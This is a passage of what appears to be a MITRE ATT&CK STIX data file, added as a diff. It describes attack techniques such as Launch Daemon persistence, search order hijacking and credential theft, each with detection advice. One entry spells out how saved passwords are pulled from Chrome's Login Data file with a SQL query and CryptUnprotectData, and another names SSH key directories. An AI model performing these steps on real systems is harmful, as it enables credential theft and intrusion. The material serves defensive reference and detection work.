Adversaries may also look in common key directories, such as ~/.ssh for SSH keys on * nix-based systems or C:\\Users\\(username)\\.ssh\\ on Windows.\n\nPrivate keys should require a password or passphrase for operation, so an adversary may also use [Input Capture](https://attack.mitre.org/techniques/T1056) for keylogging or attempt to [Brute Force](https://attack.mitre.org/techniques/T1110) the passphrase off-line.\n\nAdversary tools have been discovered that search compromised systems for file extensions relating to cryptographic keys and certificates. (Citation: Kaspersky Careto) (Citation: Palo Alto Prince of Persia)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Itzik Kotler, SafeBreach" + ], + "x_mitre_detection": "Monitor access to files and directories related to cryptographic keys and certificates as a means for potentially detecting access patterns that may indicate collection and exfiltration activity. Collect authentication logs and look for potentially abnormal activity that may indicate improper use of keys or certificates for remote authentication.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--56ff457d-5e39-492b-974c-dfd2b8603ffe", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1145", + "external_id": "T1145" + }, + { + "source_name": "Wikipedia Public Key Crypto", + "description": "Wikipedia. (2017, June 29). Public-key cryptography. Retrieved July 5, 2017.", + "url": "https://en.wikipedia.org/wiki/Public-key_cryptography" + }, + { + "source_name": "Kaspersky Careto", + "description": "Kaspersky Labs. (2014, February 11). Unveiling “Careto” - The Masked APT. Retrieved July 5, 2017.", + "url": "https://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask_v1.0.pdf" + }, + { + "source_name": "Palo Alto Prince of Persia", + "description": "Bar, T., Conant, S., Efraim, L. (2016, June 28). Prince of Persia – Game Over. Retrieved July 5, 2017.", + "url": "https://researchcenter.paloaltonetworks.com/2016/06/unit42-prince-of-persia-game-over/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-08-14T19:19:54.148Z", + "name": "Modify Registry", + "description": "Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.\n\nAccess to specific areas of the Registry depends on account permissions, some requiring administrator-level access. The built-in Windows command-line utility [Reg](https://attack.mitre.org/software/S0075) may be used for local or remote Registry modification. (Citation: Microsoft Reg) Other tools may also be used, such as a remote access tool, which may contain functionality to interact with the Registry through the Windows API.\n\nRegistry modifications may also include actions to hide keys, such as prepending key names with a null character, which will cause an error and/or be ignored when read via [Reg](https://attack.mitre.org/software/S0075) or other utilities using the Win32 API. (Citation: Microsoft Reghide NOV 2006) Adversaries may abuse these pseudo-hidden keys to conceal payloads/commands used to maintain persistence. (Citation: TrendMicro POWELIKS AUG 2014) (Citation: SpectorOps Hiding Reg Jul 2017)\n\nThe Registry of a remote system may be modified to aid in execution of files as part of lateral movement. It requires the remote Registry service to be running on the target system. (Citation: Microsoft Remote) Often [Valid Accounts](https://attack.mitre.org/techniques/T1078) are required, along with access to the remote system's [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) for RPC communication.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Bartosz Jerzman", + "Travis Smith, Tripwire", + "David Lu, Tripwire" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Modifications to the Registry are normal and occur throughout typical use of the Windows operating system. Consider enabling Registry Auditing on specific keys to produce an alertable event (Event ID 4657) whenever a value is changed (though this may not trigger when values are created with Reghide or other evasive methods). (Citation: Microsoft 4657 APR 2017) Changes to Registry entries that load software on Windows startup that do not correlate with known software, patch cycles, etc., are suspicious, as are additions or changes to files within the startup folder. Changes could also include new services and modification of existing binary paths to point to malicious files. If a change to a service-related entry occurs, then it will likely be followed by a local or remote service start or restart to execute the file.\n\nMonitor processes and command-line arguments for actions that could be taken to change or delete information in the Registry. Remote access tools with built-in features may interact directly with the Windows API to gather information. The Registry may also be modified through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), which may require additional logging features to be configured in the operating system to collect necessary information for analysis.\n\nMonitor for processes, command-line arguments, and API calls associated with concealing Registry keys, such as Reghide. (Citation: Microsoft Reghide NOV 2006) Inspect and cleanup malicious hidden Registry entries using Native Windows API calls and/or tools such as Autoruns (Citation: SpectorOps Hiding Reg Jul 2017) and RegDelNull (Citation: Microsoft RegDelNull July 2016).", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.4", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Host forensic analysis" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--57340c81-c025-4189-8fa0-fc7ede51bae4", + "created": "2017-05-31T21:31:23.587Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1112", + "external_id": "T1112" + }, + { + "source_name": "Microsoft Reg", + "description": "Microsoft. (2012, April 17). Reg. Retrieved May 1, 2015.", + "url": "https://technet.microsoft.com/en-us/library/cc732643.aspx" + }, + { + "source_name": "Microsoft Remote", + "description": "Microsoft. (n.d.). Enable the Remote Registry Service. Retrieved May 1, 2015.", + "url": "https://technet.microsoft.com/en-us/library/cc754820.aspx" + }, + { + "source_name": "Microsoft 4657 APR 2017", + "description": "Miroshnikov, A. & Hall, J. (2017, April 18). 4657(S): A registry value was modified. Retrieved August 9, 2018.", + "url": "https://docs.microsoft.com/windows/security/threat-protection/auditing/event-4657" + }, + { + "source_name": "SpectorOps Hiding Reg Jul 2017", + "description": "Reitz, B. (2017, July 14). Hiding Registry keys with PSReflect. Retrieved August 9, 2018.", + "url": "https://posts.specterops.io/hiding-registry-keys-with-psreflect-b18ec5ac8353" + }, + { + "source_name": "Microsoft Reghide NOV 2006", + "description": "Russinovich, M. & Sharkey, K. (2006, January 10). Reghide. Retrieved August 9, 2018.", + "url": "https://docs.microsoft.com/sysinternals/downloads/reghide" + }, + { + "source_name": "Microsoft RegDelNull July 2016", + "description": "Russinovich, M. & Sharkey, K. (2016, July 4). RegDelNull v1.11. Retrieved August 10, 2018.", + "url": "https://docs.microsoft.com/en-us/sysinternals/downloads/regdelnull" + }, + { + "source_name": "TrendMicro POWELIKS AUG 2014", + "description": "Santos, R. (2014, August 1). POWELIKS: Malware Hides In Windows Registry. Retrieved August 9, 2018.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/poweliks-malware-hides-in-windows-registry/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-09T14:00:00.188Z", + "name": "Launch Daemon", + "description": "Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence. Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS. Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction. During the macOS initialization startup, the launchd process loads the parameters for launch-on-demand system-level daemons from plist files found in /System/Library/LaunchDaemons/ and /Library/LaunchDaemons/. Required Launch Daemons parameters include a Label to identify the task, Program to provide a path to the executable, and RunAtLoad to specify when the task is run. Launch Daemons are often used to provide access to shared resources, updates to software, or conduct automation tasks.(Citation: AppleDocs Launch Agent Daemons)(Citation: Methods of Mac Malware Persistence)(Citation: launchd Keywords for plists)\n\nAdversaries may install a Launch Daemon configured to execute at startup by using the RunAtLoad parameter set to true and the Program parameter set to the malicious executable path. The daemon name may be disguised by using a name from a related operating system or benign software (i.e. [Masquerading](https://attack.mitre.org/techniques/T1036)). When the Launch Daemon is executed, the program inherits administrative permissions.(Citation: WireLurker)(Citation: OSX Malware Detection)\n\nAdditionally, system configuration changes (such as the installation of third party package managing software) may cause folders such as usr/local/bin to become globally writeable. So, it is possible for poor configurations to allow an adversary to modify executables referenced by current Launch Daemon's plist files.(Citation: LaunchDaemon Hijacking)(Citation: sentinelone macos persist Jun 2019)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Monitor for new files added to the /Library/LaunchDaemons/ folder. The System LaunchDaemons are protected by SIP.\n\nSome legitimate LaunchDaemons point to unsigned code that could be exploited. For Launch Daemons with the RunAtLoad parameter set to true, ensure the Program parameter points to signed code or executables are in alignment with enterprise policy. Some parameters are interchangeable with others, such as Program and ProgramArguments parameters but one must be present.(Citation: launchd Keywords for plists)\n\n", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "macOS" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "x_mitre_effective_permissions": [ + "root", + "Administrator" + ], + "x_mitre_permissions_required": [ + "Administrator" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--573ad264-1371-4ae0-8482-d2673b719dba", + "created": "2020-01-17T19:23:15.227Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1543/004", + "external_id": "T1543.004" + }, + { + "source_name": "AppleDocs Launch Agent Daemons", + "description": "Apple. (n.d.). Creating Launch Daemons and Agents. Retrieved July 10, 2017.", + "url": "https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html" + }, + { + "source_name": "Methods of Mac Malware Persistence", + "description": "Patrick Wardle. (2014, September). Methods of Malware Persistence on Mac OS X. Retrieved July 5, 2017.", + "url": "https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf" + }, + { + "source_name": "launchd Keywords for plists", + "description": "Dennis German. (2020, November 20). launchd Keywords for plists. Retrieved October 7, 2021.", + "url": "https://www.real-world-systems.com/docs/launchdPlist.1.html" + }, + { + "source_name": "WireLurker", + "description": "Claud Xiao. (n.d.). WireLurker: A New Era in iOS and OS X Malware. Retrieved July 10, 2017.", + "url": "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf" + }, + { + "source_name": "OSX Malware Detection", + "description": "Patrick Wardle. (2016, February 29). Let's Play Doctor: Practical OS X Malware Detection & Analysis. Retrieved July 10, 2017.", + "url": "https://www.synack.com/wp-content/uploads/2016/03/RSA_OSX_Malware.pdf" + }, + { + "source_name": "LaunchDaemon Hijacking", + "description": "Bradley Kemp. (2021, May 10). LaunchDaemon Hijacking: privilege escalation and persistence via insecure folder permissions. Retrieved July 26, 2021.", + "url": "https://bradleyjkemp.dev/post/launchdaemon-hijacking/" + }, + { + "source_name": "sentinelone macos persist Jun 2019", + "description": "Stokes, Phil. (2019, June 17). HOW MALWARE PERSISTS ON MACOS. Retrieved September 10, 2019.", + "url": "https://www.sentinelone.com/blog/how-malware-persists-on-macos/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-11T14:00:00.188Z", + "name": "Cloud Infrastructure Discovery", + "description": "An adversary may attempt to discover infrastructure and resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.\n\nCloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a DescribeInstances API within the Amazon EC2 API that can return information about one or more instances within an account, the ListBuckets API that returns a list of all buckets owned by the authenticated sender of the request, the HeadBucket API to determine a bucket’s existence along with access permissions of the request sender, or the GetPublicAccessBlock API to retrieve access block configuration for a bucket.(Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API)(Citation: AWS Get Public Access Block)(Citation: AWS Head Bucket) Similarly, GCP's Cloud SDK CLI provides the gcloud compute instances list command to list all Google Compute Engine instances in a project (Citation: Google Compute Instances), and Azure's CLI command az vm list lists details of virtual machines.(Citation: Microsoft AZ CLI) In addition to API commands, adversaries can utilize open source tools to discover cloud storage infrastructure through [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003).(Citation: Malwarebytes OSINT Leaky Buckets - Hioureas)\n\nAn adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020)An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries have also may use infrastructure discovery APIs such as DescribeDBInstances to determine size, owner, permissions, and network ACLs of database resources. (Citation: AWS Describe DB Instances) Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "discovery" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Regina Elwell", + "Praetorian", + "Isif Ibrahima, Mandiant" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Establish centralized logging for the activity of cloud infrastructure components. Monitor logs for actions that could be taken to gather information about cloud infrastructure, including the use of discovery API calls by new or unexpected users and enumerations from unknown or malicious IP addresses. To reduce false positives, valid change management procedures could introduce a known identifier that is logged with the change (e.g., tag or header) if supported by the cloud provider, to help distinguish valid, expected actions from malicious ones.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "IaaS" + ], + "x_mitre_version": "1.3", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--57a3d31a-d04f-4663-b2da-7df8ec3f8c9d", + "created": "2020-08-20T17:51:25.671Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1580", + "external_id": "T1580" + }, + { + "source_name": "Expel IO Evil in AWS", + "description": "A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding Evil in AWS. Retrieved June 25, 2020.", + "url": "https://expel.io/blog/finding-evil-in-aws/" + }, + { + "source_name": "AWS Head Bucket", + "description": "Amazon Web Services. (n.d.). AWS HeadBucket. Retrieved February 14, 2022.", + "url": "https://docs.aws.amazon.com/AmazonS3/latest/API/API_HeadBucket.html" + }, + { + "source_name": "AWS Get Public Access Block", + "description": "Amazon Web Services. (n.d.). Retrieved May 28, 2021.", + "url": "https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetPublicAccessBlock.html" + }, + { + "source_name": "AWS Describe DB Instances", + "description": "Amazon Web Services. (n.d.). Retrieved May 28, 2021.", + "url": "https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DescribeDBInstances.html" + }, + { + "source_name": "Amazon Describe Instance", + "description": "Amazon. (n.d.). describe-instance-information. Retrieved March 3, 2020.", + "url": "https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html" + }, + { + "source_name": "Amazon Describe Instances API", + "description": "Amazon. (n.d.). DescribeInstances. Retrieved May 26, 2020.", + "url": "https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstances.html" + }, + { + "source_name": "Google Compute Instances", + "description": "Google. (n.d.). gcloud compute instances list. Retrieved May 26, 2020.", + "url": "https://cloud.google.com/sdk/gcloud/reference/compute/instances/list" + }, + { + "source_name": "Mandiant M-Trends 2020", + "description": "Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020.", + "url": "https://content.fireeye.com/m-trends/rpt-m-trends-2020" + }, + { + "source_name": "Microsoft AZ CLI", + "description": "Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.", + "url": "https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest" + }, + { + "source_name": "Malwarebytes OSINT Leaky Buckets - Hioureas", + "description": "Vasilios Hioureas. (2019, September 13). Hacking with AWS: incorporating leaky buckets into your OSINT workflow. Retrieved February 14, 2022.", + "url": "https://blog.malwarebytes.com/researchers-corner/2019/09/hacking-with-aws-incorporating-leaky-buckets-osint-workflow/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-11T14:00:00.188Z", + "name": "Credentials from Web Browsers", + "description": "Adversaries may acquire credentials from web browsers by reading files specific to the target browser.(Citation: Talos Olympic Destroyer 2018) Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store; however, methods exist to extract plaintext credentials from web browsers.\n\nFor example, on Windows systems, encrypted credentials may be obtained from Google Chrome by reading a database file, AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data and executing a SQL query: SELECT action_url, username_value, password_value FROM logins;. The plaintext password can then be obtained by passing the encrypted credentials to the Windows API function CryptUnprotectData, which uses the victim’s cached logon credentials as the decryption key.(Citation: Microsoft CryptUnprotectData April 2018)\n \nAdversaries have executed similar procedures for common web browsers such as FireFox, Safari, Edge, etc.(Citation: Proofpoint Vega Credential Stealer May 2018)(Citation: FireEye HawkEye Malware July 2017) Windows stores Internet Explorer and Microsoft Edge credentials in Credential Lockers managed by the [Windows Credential Manager](https://attack.mitre.org/techniques/T1555/004).\n\nAdversaries may also acquire credentials by searching web browser process memory for patterns that commonly match credentials.(Citation: GitHub Mimikittenz July 2016)\n\nAfter acquiring credentials from web browsers, adversaries may attempt to recycle the credentials across different systems and/or accounts in order to expand access. This can result in significantly furthering an adversary's objective in cases where credentials gained from web browsers overlap with privileged accounts (e.g. domain administrator).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Ryan Benson, Exabeam", + "Barry Shteiman, Exabeam", + "Sylvain Gil, Exabeam", + "RedHuntLabs, @redhuntlabs" + ], + "x_mitre_detection": "Identify web browser files that contain credentials such as Google Chrome’s Login Data database file: AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data. Monitor file read events of web browser files that contain credentials, especially when the reading process is unrelated to the subject web browser. Monitor process execution logs to include PowerShell Transcription focusing on those that perform a combination of behaviors including reading web browser process memory, utilizing regular expressions, and those that contain numerous keywords for common web applications (Gmail, Twitter, Office365, etc.).", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8", + "created": "2020-02-12T18:57:36.041Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1555/003", + "external_id": "T1555.003" + }, + { + "source_name": "Talos Olympic Destroyer 2018", + "description": "Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer Takes Aim At Winter Olympics. Retrieved March 14, 2019.", + "url": "https://blog.talosintelligence.com/2018/02/olympic-destroyer.html" + }, + { + "source_name": "Microsoft CryptUnprotectData April 2018", + "description": "Microsoft. (2018, April 12). CryptUnprotectData function. Retrieved June 18, 2019.", + "url": "https://docs.microsoft.com/en-us/windows/desktop/api/dpapi/nf-dpapi-cryptunprotectdata" + }, + { + "source_name": "Proofpoint Vega Credential Stealer May 2018", + "description": "Proofpoint. (2018, May 10). New Vega Stealer shines brightly in targeted campaign . Retrieved June 18, 2019.", + "url": "https://www.proofpoint.com/us/threat-insight/post/new-vega-stealer-shines-brightly-targeted-campaign" + }, + { + "source_name": "FireEye HawkEye Malware July 2017", + "description": "Swapnil Patil, Yogesh Londhe. (2017, July 25). HawkEye Credential Theft Malware Distributed in Recent Phishing Campaign. Retrieved June 18, 2019.", + "url": "https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html" + }, + { + "source_name": "GitHub Mimikittenz July 2016", + "description": "Jamieson O'Reilly (putterpanda). (2016, July 4). mimikittenz. Retrieved June 20, 2019.", + "url": "https://github.com/putterpanda/mimikittenz" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-09T14:00:00.188Z", + "name": "Path Interception by Search Order Hijacking", + "description": "Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.\n\nSearch order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. Unlike [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), the search order differs depending on the method that is used to execute the program. (Citation: Microsoft CreateProcess) (Citation: Windows NT Command Shell) (Citation: Microsoft WinExec) However, it is common for Windows to search in the directory of the initiating program before searching through the Windows system directory. An adversary who finds a program vulnerable to search order hijacking (i.e., a program that does not specify the path to an executable) may take advantage of this vulnerability by creating a program named after the improperly specified program and placing it within the initiating program's directory.\n\nFor example, \"example.exe\" runs \"cmd.exe\" with the command-line argument net user. An adversary may place a program called \"net.exe\" within the same directory as example.exe, \"net.exe\" will be run instead of the Windows system utility net. In addition, if an adversary places a program called \"net.com\" in the same directory as \"net.exe\", then cmd.exe /C net user will execute \"net.com\" instead of \"net.exe\" due to the order of executable extensions defined under PATHEXT. (Citation: Microsoft Environment Property)\n\nSearch order hijacking is also a common practice for hijacking DLL loads and is covered in [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Stefan Kanthak" + ], + "x_mitre_detection": "Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as \"findstr,\" \"net,\" and \"python\"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.\n\nData and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.\n", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_effective_permissions": [ + "Administrator", + "SYSTEM", + "User" + ], + "x_mitre_permissions_required": [ + "Administrator", + "User", + "SYSTEM" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2", + "created": "2020-03-13T17:48:58.999Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1574/008", + "external_id": "T1574.008" + }, + { + "source_name": "Microsoft CreateProcess", + "description": "Microsoft. (n.d.). CreateProcess function. Retrieved December 5, 2014.", + "url": "http://msdn.microsoft.com/en-us/library/ms682425" + }, + { + "source_name": "Windows NT Command Shell", + "description": "Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved December 5, 2014.", + "url": "https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120" + }, + { + "source_name": "Microsoft WinExec", + "description": "Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014.", + "url": "http://msdn.microsoft.com/en-us/library/ms687393" + }, + { + "source_name": "Microsoft Environment Property", + "description": "Microsoft. (2011, October 24). Environment Property. Retrieved July 27, 2016.", + "url": "https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-11T14:00:00.188Z", + "name": "Defacement", + "description": "Adversaries may modify visual content available internally or externally to an enterprise network, thus affecting the integrity of the original content. Reasons for [Defacement](https://attack.mitre.org/techniques/T1491) include delivering messaging, intimidation, or claiming (possibly false) credit for an intrusion. Disturbing or offensive images may be used as a part of [Defacement](https://attack.mitre.org/techniques/T1491) in order to cause user discomfort, or to pressure compliance with accompanying messages. \n", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "impact" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Monitor internal and external websites for unplanned content changes. Monitor application logs for abnormal behavior that may indicate attempted or successful exploitation. Use deep packet inspection to look for artifacts of common exploit traffic, such as SQL injection. Web Application Firewalls may detect improper inputs attempting exploitation.\n\n", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "IaaS", + "Linux", + "macOS" + ], + "x_mitre_version": "1.3", + "x_mitre_data_sources": [], + "x_mitre_impact_type": [ + "Integrity" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--5909f20f-3c39-4795-be06-ef1ea40d350b", + "created": "2019-04-08T17:51:41.390Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1491", + "external_id": "T1491" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-12-14T16:28:24.680Z", + "name": "Unused/Unsupported Cloud Regions", + "description": "Adversaries may create cloud instances in unused geographic service regions in order to evade detection. Access is usually obtained through compromising accounts used to manage cloud infrastructure.\n\nCloud service providers often provide infrastructure throughout the world in order to improve performance, provide redundancy, and allow customers to meet compliance requirements. Oftentimes, a customer will only use a subset of the available regions and may not actively monitor other regions. If an adversary creates resources in an unused region, they may be able to operate undetected.\n\nA variation on this behavior takes advantage of differences in functionality across cloud regions. An adversary could utilize regions which do not support advanced detection services in order to avoid detection of their activity.\n\nAn example of adversary use of unused AWS regions is to mine cryptocurrency through [Resource Hijacking](https://attack.mitre.org/techniques/T1496), which can cost organizations substantial amounts of money over time depending on the processing power used.(Citation: CloudSploit - Unused AWS Regions)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Netskope" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor system logs to review activities occurring across all cloud environments and regions. Configure alerting to notify of activity in normally unused regions or if the number of instances active in a region goes above a certain threshold.(Citation: CloudSploit - Unused AWS Regions)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "IaaS" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--59bd0dec-f8b2-4b9a-9141-37a1e6899761", + "created": "2019-09-04T14:35:04.617Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1535", + "external_id": "T1535" + }, + { + "source_name": "CloudSploit - Unused AWS Regions", + "description": "CloudSploit. (2019, June 8). The Danger of Unused AWS Regions. Retrieved October 8, 2019.", + "url": "https://medium.com/cloudsploit/the-danger-of-unused-aws-regions-af0bf1b878fc" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": 